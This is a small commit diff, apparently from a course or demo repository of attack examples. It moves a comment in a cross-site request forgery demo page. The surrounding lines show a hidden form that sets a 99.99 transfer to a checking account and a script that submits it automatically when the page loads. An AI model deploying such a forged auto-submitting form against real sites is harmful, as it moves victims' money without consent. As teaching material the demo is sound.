add comments & citations

--- a/attack-demos/csrf/promotion.html
+++ b/attack-demos/csrf/promotion.html
@@ -28,8 +28,9 @@
     <input type="hidden" name="to_account" value="checking">
     <input type="hidden" name="amount" value="99.99"/>
   </form>
+
+	<!-- submit the form upon loading the page -->
   <script>
-    // submit the form upon loading the page
     document.forms[0].submit();
   </script>
 </body>
